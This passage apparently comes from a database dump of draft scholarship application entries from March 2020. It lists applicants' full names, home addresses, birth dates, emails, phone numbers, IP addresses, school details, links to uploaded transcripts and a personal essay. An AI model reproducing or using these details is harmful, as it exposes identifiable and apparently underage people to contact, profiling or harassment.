City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"9\":\"3.83\",\"26\":\"Business or Biology  and pre-med \",\"12\":\"NA\",\"14\":\"Future Business Leaders of America \\r\\n\\r\\n\\r\\nAssist CEO\\u2019s with all duties assigned to them\\r\\nPlan and organize workshops \\r\\nMentor underclassman in events\\r\\n\\r\\n\",\"13\":\"\",\"36\":\"\",\"37\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"\",\"41\":\"\",\"35\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/Unofficialtranscript.pdf\",\"33\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/ReleaseForm.pdf\",\"34\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/Ireheadpic.pdf\"},\"field_values\":\"\",\"page_number\":\"1\",\"files\":[],\"gform_unique_id\":\"5e816706f2730\"}'),('6e703a6b9c384794a50b1ce5c97fd761','n.sapong@yahoo.com',6,'2020-03-26 18:35:10','69.140.29.114','https://zphiblgz.org/scholarship/application/','{\"submitted_values\":{\"3\":\"\",\"18\":{\"18.2\":\"\",\"18.3\":\"Nana\",\"18.4\":\"\",\"18.6\":\"Sapong\",\"18.8\":\"\"},\"19\":{\"19.1\":\"7184 Deep Falls Way\",\"19.2\":\"\",\"19.3\":\"Elkridge\",\"19.4\":\"MD\",\"19.5\":\"21075\",\"19.6\":\"United States\",\"19_copy_values_activated\":false},\"4\":\"01-14-02\",\"21\":\"n.sapong@yahoo.com\",\"20\":\"(443) 538-8668\",\"10\":\"Long Reach High School\",\"27\":\"School Counselor\\/Advisor\",\"28\":\"N\\/A\",\"8\":\"\",\"9\":\"3.52\",\"26\":\"Accounting\\/Information Systems\",\"12\":\"N\\/A\",\"14\":\"Delta Scholars, a member, two years\\r\\nNational Society of High School Scholars, a member, two years\\r\\nBig Sister Little Sister, mentor, zero years three months\\r\\nFuture Business Leaders of America, member, zero years six months\\r\\nCybersecurity Security Council, representative for cybersecurity academy, zero years one month\",\"13\":\"Minds in Motion Scholar Athlete Award, 2017\\r\\nInvited Scholar for Distinguished Alumni Long Reach High School, 2019\\r\\nStudent of the Month, 2017-2019\\r\\nAcademic Achievement and Excellence from National Society of High School Scholars, 2018\\r\\nInvitation to attend a boarding of education meeting for my county, 2019\",\"36\":\"Harvest Chapel International,  Sunday school teacher, Aug 2016-Present\\r\\nBabysitter for the community, Babysitter, Summer 2014-Summer 2018\\r\\nHarvest Chapel International Praise Ministries, Youth leader, Summer 2019\",\"37\":\"George Mason\\r\\nHoward University\",\"16\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"\",\"41\":\"\",\"35\":\"\",\"22\":\"\",\"33\":\"\",\"32\":\"\",\"34\":\"\",\"42\":null},\"partial_entry\":{\"id\":null,\"post_id\":null,\"date_created\":null,\"form_id\":6,\"ip\":\"69.140.29.114\",\"source_url\":\"https:\\/\\/zphiblgz.org\\/scholarship\\/application\\/\",\"user_agent\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit\\/605.1.15 (KHTML, like Gecko) Version\\/13.0.5 Safari\\/605.1.15\",\"created_by\":\"NULL\",\"currency\":\"USD\",\"18.2\":\"\",\"18.3\":\"Nana\",\"18.4\":\"\",\"18.6\":\"Sapong\",\"18.8\":\"\",\"19.1\":\"7184 Deep Falls Way\",\"19.2\":\"\",\"19.3\":\"Elkridge\",\"19.4\":\"MD\",\"19.5\":\"21075\",\"19.6\":\"United States\",\"4\":\"01-14-02\",\"21\":\"n.sapong@yahoo.com\",\"20\":\"(443) 538-8668\",\"10\":\"Long Reach High School\",\"27\":\"School Counselor\\/Advisor\",\"28\":\"N\\/A\",\"9\":\"3.52\",\"26\":\"Accounting\\/Information Systems\",\"12\":\"N\\/A\",\"14\":\"Delta Scholars, a member, two years\\r\\nNational Society of High School Scholars, a member, two years\\r\\nBig Sister Little Sister, mentor, zero years three months\\r\\nFuture Business Leaders of America, member, zero years six months\\r\\nCybersecurity Security Council, representative for cybersecurity academy, zero years one month\",\"13\":\"Minds in Motion Scholar Athlete Award, 2017\\r\\nInvited Scholar for Distinguished Alumni Long Reach High School, 2019\\r\\nStudent of the Month, 2017-2019\\r\\nAcademic Achievement and Excellence from National Society of High School Scholars, 2018\\r\\nInvitation to attend a boarding of education meeting for my county, 2019\",\"36\":\"Harvest Chapel International,  Sunday school teacher, Aug 2016-Present\\r\\nBabysitter for the community, Babysitter, Summer 2014-Summer 2018\\r\\nHarvest Chapel International Praise Ministries, Youth leader, Summer 2019\",\"37\":\"George Mason\\r\\nHoward University\",\"38\":\"\",\"39\":\"\",\"40\":\"\",\"41\":\"\",\"35\":\"\",\"33\":\"\",\"34\":\"\"},\"field_values\":\"\",\"page_number\":\"0\",\"files\":[],\"gform_unique_id\":\"5e6eb80e8f3ac\"}'),('f27de2e250704874b3b6be0257a1dcd5',NULL,6,'2020-03-30 03:06:07','72.81.137.185','https://zphiblgz.org/scholarship/application/','{\"submitted_values\":{\"3\":\"\",\"18\":{\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\"},\"19\":{\"19.1\":\"5114 Honey Locust Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"19_copy_values_activated\":false},\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"8\":\"\",\"9\":\"\",\"26\":\"\",\"12\":\"\",\"14\":\"\",\"13\":\"\",\"36\":\"\",\"37\":\"\",\"16\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"\",\"41\":\"\",\"35\":\"\",\"22\":\"\",\"33\":\"\",\"32\":\"\",\"34\":\"\",\"42\":null},\"partial_entry\":{\"id\":null,\"post_id\":null,\"date_created\":null,\"form_id\":6,\"ip\":\"72.81.137.185\",\"source_url\":\"https:\\/\\/zphiblgz.org\\/scholarship\\/application\\/\",\"user_agent\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\",\"created_by\":\"NULL\",\"currency\":\"USD\",\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\",\"19.1\":\"5114 Honey Locust Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"9\":\"\",\"26\":\"\",\"12\":\"\",\"14\":\"\",\"13\":\"\",\"36\":\"\",\"37\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"\",\"41\":\"\",\"35\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/Unofficialtranscript.pdf\",\"33\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/ReleaseForm.pdf\",\"34\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/IreHeadshot.pdf\"},\"field_values\":\"\",\"page_number\":\"1\",\"files\":[],\"gform_unique_id\":\"5e81621f775b6\"}'),('e96c483c02364ac3a24ea3baa9550c93',NULL,6,'2020-03-30 03:39:39','72.81.137.185','https://zphiblgz.org/scholarship/application/','{\"submitted_values\":{\"3\":\"\",\"18\":{\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\"},\"19\":{\"19.1\":\"5114 Honey Locust Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"19_copy_values_activated\":false},\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"8\":\"\",\"9\":\"3.83\",\"26\":\"Business or Biology  and pre-med\",\"12\":\"NA\",\"14\":\"-Future Business Leaders of America  \\r\\n Executive Vice President   June 2019- Present\\r\\n Officer at Large                      June 2018 - June 2019\\r\\n General Member                    September 2016 - June 2018 \\r\\n\\r\\n-River Hill POMS  \\r\\nTeam Captain        April 2018 - Present\\r\\nGeneral Member  September 2016- April 2018\\r\\n\\r\\n-Black Leadership Union \\r\\nPresident  September 2019 - Present\\r\\nHistorian   September 2018 - June 2019\\r\\nGeneral Member September 2016- June 2018\\r\\n\\r\\n-National Honor Society \\r\\nMember November 2018 - Present\\r\\n\\r\\n-Delta Scholars \\r\\nVice President  September 2019 - Present\\r\\n BLU Liaison         September 2018- June 2019\\r\\n General Member September 2017- June 2018\\r\\n\\r\\n-Class of 2020 Student Government Association \\r\\nVice President  June 2017- Present\\r\\n\\r\\n-Leadership, Education, and Development (LEAD) Program \\r\\n Participant                            July 2019\\r\\nSelected to attend the program at the Wharton School at the University of Pennsylvania out of hundreds of applicants\\r\\nStrengthened and developed communication skills within a diverse group of students \\r\\n\\r\\n-Kindred Hair and Skin Center \\r\\n Internship\\t\\t\\t  September 2018 - Present\\r\\nShadow board certified dermatologist  in appointments and various dermatology procedures\\r\\nOrganize and complete paperwork \\r\\n\\r\\n-Maryland Leadership Workshop \\r\\nAdvanced Leadership Workshop, University of Maryland, Baltimore County \\t                                   July 2018\\r\\nSenior High Camp, Washington College\\t\\t\\t\\t\\t                                   July 2017\\r\\nNetworked and partnered with students across Maryland to analyze real life scenarios\\/problems and develop probable solutions\\r\\n\\r\\n-Junior Achievement Rising Woman \\r\\nVP of Supply Chain\\t            September 2017 - January 2018\\r\\nWorked as part of a team to build a company and product\\r\\nServed as team supply chain lead to create and source materials and negotiate prices with various suppliers\",\"13\":\"Senior Dance Company Outstanding Achievement Award                    [ June 2017, June 2018, June 2019]\\r\\nMid Atlantic Poms & Dance Association State Championship|1st place Team  [March 2017, March 2019]\\r\\nFuture Business Leaders of America State Conference|4th place Business Plan\\/Presentation     [March 2019]\\r\\nDistributive Education Clubs of America State Conference|2nd place Role Play                [February 2019]\\r\\nAcademic Achievement Award| English Honors, Biology GT                                       [ June 2017, June 2018]\\r\\nFuture Business Leaders of America State Conference|2nd place Presentation                       [ March  2018]\\r\\nFuture Business Leaders of America Regional Conference|1st place Presentation                [ January 2018]\",\"36\":\"\",\"37\":\"\",\"16\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"\",\"41\":\"\",\"35\":\"\",\"22\":\"\",\"33\":\"\",\"32\":\"\",\"34\":\"\",\"42\":null},\"partial_entry\":{\"id\":null,\"post_id\":null,\"date_created\":null,\"form_id\":6,\"ip\":\"72.81.137.185\",\"source_url\":\"https:\\/\\/zphiblgz.org\\/scholarship\\/application\\/\",\"user_agent\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\",\"created_by\":\"NULL\",\"currency\":\"USD\",\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\",\"19.1\":\"5114 Honey Locust Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"9\":\"3.83\",\"26\":\"Business or Biology  and pre-med \",\"12\":\"NA\",\"14\":\"-Future Business Leaders of America  \\r\\n Executive Vice President   June 2019- Present\\r\\n Officer at Large                      June 2018 - June 2019\\r\\n General Member                    September 2016 - June 2018 \\r\\n\\r\\n-River Hill POMS  \\r\\nTeam Captain        April 2018 - Present\\r\\nGeneral Member  September 2016- April 2018\\r\\n\\r\\n-Black Leadership Union \\r\\nPresident  September 2019 - Present\\r\\nHistorian   September 2018 - June 2019\\r\\nGeneral Member September 2016- June 2018\\r\\n\\r\\n-National Honor Society \\r\\nMember November 2018 - Present\\r\\n\\r\\n-Delta Scholars \\r\\nVice President  September 2019 - Present\\r\\n BLU Liaison         September 2018- June 2019\\r\\n General Member September 2017- June 2018\\r\\n\\r\\n-Class of 2020 Student Government Association \\r\\nVice President  June 2017- Present\\r\\n\\r\\n-Leadership, Education, and Development (LEAD) Program \\r\\n Participant                            July 2019\\r\\nSelected to attend the program at the Wharton School at the University of Pennsylvania out of hundreds of applicants\\r\\nStrengthened and developed communication skills within a diverse group of students \\r\\n\\r\\n-Kindred Hair and Skin Center \\r\\n Internship\\t\\t\\t  September 2018 - Present\\r\\nShadow board certified dermatologist  in appointments and various dermatology procedures\\r\\nOrganize and complete paperwork \\r\\n\\r\\n-Maryland Leadership Workshop \\r\\nAdvanced Leadership Workshop, University of Maryland, Baltimore County \\t                                   July 2018\\r\\nSenior High Camp, Washington College\\t\\t\\t\\t\\t                                   July 2017\\r\\nNetworked and partnered with students across Maryland to analyze real life scenarios\\/problems and develop probable solutions\\r\\n\\r\\n-Junior Achievement Rising Woman \\r\\nVP of Supply Chain\\t            September 2017 - January 2018\\r\\nWorked as part of a team to build a company and product\\r\\nServed as team supply chain lead to create and source materials and negotiate prices with various suppliers\\r\\n\\r\\n\\r\\n\\r\\n\",\"13\":\"Senior Dance Company Outstanding Achievement Award                    [ June 2017, June 2018, June 2019]\\r\\nMid Atlantic Poms & Dance Association State Championship|1st place Team  [March 2017, March 2019]\\r\\nFuture Business Leaders of America State Conference|4th place Business Plan\\/Presentation     [March 2019]\\r\\nDistributive Education Clubs of America State Conference|2nd place Role Play                [February 2019]\\r\\nAcademic Achievement Award| English Honors, Biology GT                                       [ June 2017, June 2018]\\r\\nFuture Business Leaders of America State Conference|2nd place Presentation                       [ March  2018]\\r\\nFuture Business Leaders of America Regional Conference|1st place Presentation                [ January 2018]\\r\\n\",\"36\":\"\\r\\n\",\"37\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"\",\"41\":\"\",\"35\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/Unofficialtranscript.pdf\",\"33\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/ReleaseForm.pdf\",\"34\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/Ireheadpic.pdf\"},\"field_values\":\"\",\"page_number\":\"1\",\"files\":[],\"gform_unique_id\":\"5e8169fb5eea7\"}'),('6fab6feb30ac433bb31872f5c2c066d0',NULL,6,'2020-03-30 03:40:06','72.81.137.185','https://zphiblgz.org/scholarship/application/','{\"submitted_values\":{\"3\":\"\",\"18\":{\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\"},\"19\":{\"19.1\":\"5114 Honey Locust Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"19_copy_values_activated\":false},\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"8\":\"\",\"9\":\"3.83\",\"26\":\"Business or Biology  and pre-med\",\"12\":\"NA\",\"14\":\"-Future Business Leaders of America  \\r\\n Executive Vice President   June 2019- Present\\r\\n Officer at Large                      June 2018 - June 2019\\r\\n General Member                    September 2016 - June 2018 \\r\\n\\r\\n-River Hill POMS  \\r\\nTeam Captain        April 2018 - Present\\r\\nGeneral Member  September 2016- April 2018\\r\\n\\r\\n-Black Leadership Union \\r\\nPresident  September 2019 - Present\\r\\nHistorian   September 2018 - June 2019\\r\\nGeneral Member September 2016- June 2018\\r\\n\\r\\n-National Honor Society \\r\\nMember November 2018 - Present\\r\\n\\r\\n-Delta Scholars \\r\\nVice President  September 2019 - Present\\r\\n BLU Liaison         September 2018- June 2019\\r\\n General Member September 2017- June 2018\\r\\n\\r\\n-Class of 2020 Student Government Association \\r\\nVice President  June 2017- Present\\r\\n\\r\\n-Leadership, Education, and Development (LEAD) Program \\r\\n Participant                            July 2019\\r\\nSelected to attend the program at the Wharton School at the University of Pennsylvania out of hundreds of applicants\\r\\nStrengthened and developed communication skills within a diverse group of students \\r\\n\\r\\n-Kindred Hair and Skin Center \\r\\n Internship\\t\\t\\t  September 2018 - Present\\r\\nShadow board certified dermatologist  in appointments and various dermatology procedures\\r\\nOrganize and complete paperwork \\r\\n\\r\\n-Maryland Leadership Workshop \\r\\nAdvanced Leadership Workshop, University of Maryland, Baltimore County \\t                                   July 2018\\r\\nSenior High Camp, Washington College\\t\\t\\t\\t\\t                                   July 2017\\r\\nNetworked and partnered with students across Maryland to analyze real life scenarios\\/problems and develop probable solutions\\r\\n\\r\\n-Junior Achievement Rising Woman \\r\\nVP of Supply Chain\\t            September 2017 - January 2018\\r\\nWorked as part of a team to build a company and product\\r\\nServed as team supply chain lead to create and source materials and negotiate prices with various suppliers\",\"13\":\"Senior Dance Company Outstanding Achievement Award                    [ June 2017, June 2018, June 2019]\\r\\nMid Atlantic Poms & Dance Association State Championship|1st place Team  [March 2017, March 2019]\\r\\nFuture Business Leaders of America State Conference|4th place Business Plan\\/Presentation     [March 2019]\\r\\nDistributive Education Clubs of America State Conference|2nd place Role Play                [February 2019]\\r\\nAcademic Achievement Award| English Honors, Biology GT                                       [ June 2017, June 2018]\\r\\nFuture Business Leaders of America State Conference|2nd place Presentation                       [ March  2018]\\r\\nFuture Business Leaders of America Regional Conference|1st place Presentation                [ January 2018]\",\"36\":\"\",\"37\":\"University of Southern California \\r\\nScripps College\\r\\nUniversity of North Carolina \\r\\nUniversity of Maryland College Park\\r\\nSpelman College\",\"16\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"\",\"41\":\"\",\"35\":\"\",\"22\":\"\",\"33\":\"\",\"32\":\"\",\"34\":\"\",\"42\":null},\"partial_entry\":{\"id\":null,\"post_id\":null,\"date_created\":null,\"form_id\":6,\"ip\":\"72.81.137.185\",\"source_url\":\"https:\\/\\/zphiblgz.org\\/scholarship\\/application\\/\",\"user_agent\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\",\"created_by\":\"NULL\",\"currency\":\"USD\",\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\",\"19.1\":\"5114 Honey Locust Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"9\":\"3.83\",\"26\":\"Business or Biology  and pre-med \",\"12\":\"NA\",\"14\":\"-Future Business Leaders of America  \\r\\n Executive Vice President   June 2019- Present\\r\\n Officer at Large                      June 2018 - June 2019\\r\\n General Member                    September 2016 - June 2018 \\r\\n\\r\\n-River Hill POMS  \\r\\nTeam Captain        April 2018 - Present\\r\\nGeneral Member  September 2016- April 2018\\r\\n\\r\\n-Black Leadership Union \\r\\nPresident  September 2019 - Present\\r\\nHistorian   September 2018 - June 2019\\r\\nGeneral Member September 2016- June 2018\\r\\n\\r\\n-National Honor Society \\r\\nMember November 2018 - Present\\r\\n\\r\\n-Delta Scholars \\r\\nVice President  September 2019 - Present\\r\\n BLU Liaison         September 2018- June 2019\\r\\n General Member September 2017- June 2018\\r\\n\\r\\n-Class of 2020 Student Government Association \\r\\nVice President  June 2017- Present\\r\\n\\r\\n-Leadership, Education, and Development (LEAD) Program \\r\\n Participant                            July 2019\\r\\nSelected to attend the program at the Wharton School at the University of Pennsylvania out of hundreds of applicants\\r\\nStrengthened and developed communication skills within a diverse group of students \\r\\n\\r\\n-Kindred Hair and Skin Center \\r\\n Internship\\t\\t\\t  September 2018 - Present\\r\\nShadow board certified dermatologist  in appointments and various dermatology procedures\\r\\nOrganize and complete paperwork \\r\\n\\r\\n-Maryland Leadership Workshop \\r\\nAdvanced Leadership Workshop, University of Maryland, Baltimore County \\t                                   July 2018\\r\\nSenior High Camp, Washington College\\t\\t\\t\\t\\t                                   July 2017\\r\\nNetworked and partnered with students across Maryland to analyze real life scenarios\\/problems and develop probable solutions\\r\\n\\r\\n-Junior Achievement Rising Woman \\r\\nVP of Supply Chain\\t            September 2017 - January 2018\\r\\nWorked as part of a team to build a company and product\\r\\nServed as team supply chain lead to create and source materials and negotiate prices with various suppliers\\r\\n\\r\\n\\r\\n\\r\\n\",\"13\":\"Senior Dance Company Outstanding Achievement Award                    [ June 2017, June 2018, June 2019]\\r\\nMid Atlantic Poms & Dance Association State Championship|1st place Team  [March 2017, March 2019]\\r\\nFuture Business Leaders of America State Conference|4th place Business Plan\\/Presentation     [March 2019]\\r\\nDistributive Education Clubs of America State Conference|2nd place Role Play                [February 2019]\\r\\nAcademic Achievement Award| English Honors, Biology GT                                       [ June 2017, June 2018]\\r\\nFuture Business Leaders of America State Conference|2nd place Presentation                       [ March  2018]\\r\\nFuture Business Leaders of America Regional Conference|1st place Presentation                [ January 2018]\\r\\n\",\"36\":\"\\r\\n\",\"37\":\"University of Southern California \\r\\nScripps College\\r\\nUniversity of North Carolina \\r\\nUniversity of Maryland College Park\\r\\nSpelman College\",\"38\":\"\",\"39\":\"\",\"40\":\"\",\"41\":\"\",\"35\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/Unofficialtranscript.pdf\",\"33\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/ReleaseForm.pdf\",\"34\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/Ireheadpic.pdf\"},\"field_values\":\"\",\"page_number\":\"1\",\"files\":[],\"gform_unique_id\":\"5e816a1634006\"}'),('d618fa88cb844e78a6058a807db9edb2',NULL,6,'2020-03-30 03:40:37','72.81.137.185','https://zphiblgz.org/scholarship/application/','{\"submitted_values\":{\"3\":\"\",\"18\":{\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\"},\"19\":{\"19.1\":\"5114 Honey Locust Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"19_copy_values_activated\":false},\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"8\":\"\",\"9\":\"3.83\",\"26\":\"Business or Biology  and pre-med\",\"12\":\"NA\",\"14\":\"-Future Business Leaders of America  \\r\\n Executive Vice President   June 2019- Present\\r\\n Officer at Large                      June 2018 - June 2019\\r\\n General Member                    September 2016 - June 2018 \\r\\n\\r\\n-River Hill POMS  \\r\\nTeam Captain        April 2018 - Present\\r\\nGeneral Member  September 2016- April 2018\\r\\n\\r\\n-Black Leadership Union \\r\\nPresident  September 2019 - Present\\r\\nHistorian   September 2018 - June 2019\\r\\nGeneral Member September 2016- June 2018\\r\\n\\r\\n-National Honor Society \\r\\nMember November 2018 - Present\\r\\n\\r\\n-Delta Scholars \\r\\nVice President  September 2019 - Present\\r\\n BLU Liaison         September 2018- June 2019\\r\\n General Member September 2017- June 2018\\r\\n\\r\\n-Class of 2020 Student Government Association \\r\\nVice President  June 2017- Present\\r\\n\\r\\n-Leadership, Education, and Development (LEAD) Program \\r\\n Participant                            July 2019\\r\\nSelected to attend the program at the Wharton School at the University of Pennsylvania out of hundreds of applicants\\r\\nStrengthened and developed communication skills within a diverse group of students \\r\\n\\r\\n-Kindred Hair and Skin Center \\r\\n Internship\\t\\t\\t  September 2018 - Present\\r\\nShadow board certified dermatologist  in appointments and various dermatology procedures\\r\\nOrganize and complete paperwork \\r\\n\\r\\n-Maryland Leadership Workshop \\r\\nAdvanced Leadership Workshop, University of Maryland, Baltimore County \\t                                   July 2018\\r\\nSenior High Camp, Washington College\\t\\t\\t\\t\\t                                   July 2017\\r\\nNetworked and partnered with students across Maryland to analyze real life scenarios\\/problems and develop probable solutions\\r\\n\\r\\n-Junior Achievement Rising Woman \\r\\nVP of Supply Chain\\t            September 2017 - January 2018\\r\\nWorked as part of a team to build a company and product\\r\\nServed as team supply chain lead to create and source materials and negotiate prices with various suppliers\",\"13\":\"Senior Dance Company Outstanding Achievement Award                    [ June 2017, June 2018, June 2019]\\r\\nMid Atlantic Poms & Dance Association State Championship|1st place Team  [March 2017, March 2019]\\r\\nFuture Business Leaders of America State Conference|4th place Business Plan\\/Presentation     [March 2019]\\r\\nDistributive Education Clubs of America State Conference|2nd place Role Play                [February 2019]\\r\\nAcademic Achievement Award| English Honors, Biology GT                                       [ June 2017, June 2018]\\r\\nFuture Business Leaders of America State Conference|2nd place Presentation                       [ March  2018]\\r\\nFuture Business Leaders of America Regional Conference|1st place Presentation                [ January 2018]\",\"36\":\"\",\"37\":\"University of Southern California \\r\\nScripps College\\r\\nUniversity of North Carolina \\r\\nUniversity of Maryland College Park\\r\\nSpelman College\",\"16\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"As Executive Vice President in FBLA to a Delta Scholar to VP of Supply Chain of Junior Achievement Rising Women, representation and inclusion have defined my high school experiences. I have always claimed the title of the \\u201conly black girl,\\u201d in all my activities: my classroom, girl scout troop, bible study. At first, I dismissed the title because it was all I knew. As I grew older, \\u201conly black girl\\u201d became my anchor for self-confidence, growth, and faith. \\r\\nI observed the lack of representation and its subsequent effect. For me, growing older also meant an influx of hair and skin issues ranging from alopecia to severe acne. The absence of diversity in the dermatology field made it difficult for me to find solutions that would work for my ethnic skin and hair. However, the moment I was seen by a dermatologist who looked like me, an African American woman, she knew immediately what to do. This significant moment inspired me to initiate change and become a dermatologist myself. \\r\\n\\u201cOnly black girl\\u201d is now a label that no longer anchors me, but motivates me to be a part of representation, participating in programs that will affect change. This past summer, I spent three weeks at the University of Pennsylvania Wharton School through the LEAD program. I learned how identities influence consumers decisions from Ester Uduehi, President of the Wharton Society for the Advancement of Women in Business Academia. While visiting Fortune 500 companies such as American Express, Morgan Stanley, and Lion Brothers, I learned about corporate dynamics and responsibilities. Later, interning at a dermatology practice, I had the opportunity to shadow my mentor and also assist in various procedures such as laser treatments, alopecia treatments (cortisone shots, platelet rich plasma treatments), and mole removals. I was also exposed to effective management of a medical practice by my mentor, a woman of color, while conducting research discovering the relationship between curl patterns and hair loss. (https:\\/\\/therbcpa.weebly.com\\/ ) \\r\\nA college education is necessary in order for me the knowledge I need to pursue my dream as a physician entrepreneur. At university, I aspire to major in business while being on a pre-med track during my undergraduate training and to participate in a MD\\/MBA program to pursue my dream as a physician entrepreneur. Growing up in a family of physicians, I have witnessed an increasing need for doctors to possess an extensive knowledge of business and a discernment of the healthcare industry. \\r\\nThis path requires many years of education including undergraduate, medical school, and residency; due to doing both business and medicine, I will most likely have to do another year of undergraduate as well. This adds up to approximately 13-14 years of education and the cost of the journey adds up to about $600,000; a very expensive endeavor. However, no matter the cost, this education is necessary in order for me to become an agent of change in the dermatology field; to be the person who people of color look to for aid.\",\"41\":\"\",\"35\":\"\",\"22\":\"\",\"33\":\"\",\"32\":\"\",\"34\":\"\",\"42\":null},\"partial_entry\":{\"id\":null,\"post_id\":null,\"date_created\":null,\"form_id\":6,\"ip\":\"72.81.137.185\",\"source_url\":\"https:\\/\\/zphiblgz.org\\/scholarship\\/application\\/\",\"user_agent\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\",\"created_by\":\"NULL\",\"currency\":\"USD\",\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\",\"19.1\":\"5114 Honey Locust 